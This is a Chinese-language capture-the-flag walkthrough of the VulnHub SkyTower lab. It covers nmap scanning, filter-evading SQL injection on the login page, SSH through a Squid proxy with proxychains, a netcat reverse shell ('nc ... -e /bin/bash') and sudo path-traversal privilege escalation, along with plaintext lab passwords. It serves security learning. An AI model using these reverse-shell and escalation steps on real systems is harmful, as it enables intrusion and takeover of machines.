vulnhub-skytower
forg12
  2022-08-11 09:05:58 2022-08-11 09:05      815 字  

概要

信息收集

主机发现

1
2
3
4
5
nmap -sP 192.168.2.0/24
Starting Nmap 7.92 ( https://nmap.org ) 

Nmap scan report for 192.168.2.176
Host is up (0.16s latency).

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
nmap -p-  192.168.2.176    
Starting Nmap 7.92 ( https://nmap.org )
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 97.59% done; ETC: 14:01 (0:00:00 remaining)
Nmap scan report for 192.168.2.176
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http

服务探针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
 nmap -p22,80,3128 -T5 -sV -A 192.168.2.176
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.176
Host is up (0.0099s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.55 seconds

80

​ 80端口进来是一个登录页面,尝试查看是否存在注入。

image-20220817141404526

image-20220817141306871

​ 可以发现有报错信息,可能存在sql注入。

漏洞利用

sql注入

​ 单引号报错,然后使用and ,or试试。

image-20220817142138793

​ 发现没起作用,多加个引号看看报错回显的信息。

image-20220817142253242

​ 从回显大概可以看到这里and 以及 =都被过滤了,在关键字中间加上字母严重猜想。

image-20220817142526649

​ 试试关键字复写。

image-20220817142621621

​ 也不行,使用运算符试试。

image-20220817142726150

​ 尝试成功,返回的结果通过。

image-20220817143126560

翻译:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
欢迎 john@skytech.com

如您所知,SkyTech 已停止所有国际业务。

对于我们所有的长期员工,我们希望对您的奉献和辛勤工作表示感谢。

不幸的是,包括您在内的所有国际合同都已终止。

您的剩余合同和退休基金 2 美元已全额支付到安全账户。 出于安全原因,您必须通过 SSH 登录 SkyTech 服务器才能访问帐户详细信息。

用户名: john
密码: hereisjohn

我们祝您在未来的工作中好运。

​ 得到ssh登录账号密码,结果发现连接超时,结合前面端口探针拿到的代理端口,使用代理端口再尝试登录。这里使用proxychains。

1
http    192.168.2.176 3128
1
proxychains ssh john@192.168.2.176

image-20220817143556735

image-20220817143655240

1
2
Funds have been withdrawn
资金已被提取

​ 这里刚登录上就被关闭了,然后提示资金已被提取后就被断开,所以这里需要直接登录时通过nc反弹shell。

1
2
3
proxychains ssh john@192.168.2.176 nc 192.168.2.177 2233 -e /bin/bash

nc -lvnp 2233

image-20220817144455008

image-20220817144440393

​ 或者利用另外一种方式,删除.bashrc

1
proxychains ssh john@192.168.2.176 mv .bashrc .bashrc.bak

image-20220817153051915

权限提升

mysql信息收集

​ 因为用msf提取没有成功,这里想进数据库收集点信息。

image-20220817152648699

image-20220817153511211

sara ssh登录

1
2
sara
ihatethisjob

​ 尝试了之后发现sara的密码和ssh登录密码也是一致的,然后通过sudo -l看到该用户可以以root权限使用catls命令查看/accounts下的所有文件。

image-20220817153953752

../绕过

​ 通过../来跳过只查看accounts文件夹限制,然后拿到了root用户的密码。

1
2
3
4
5
6
7
sara@SkyTower:~$ sudo ls /accounts/../root/
flag.txt

sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

image-20220817154421885

image-20220817154650340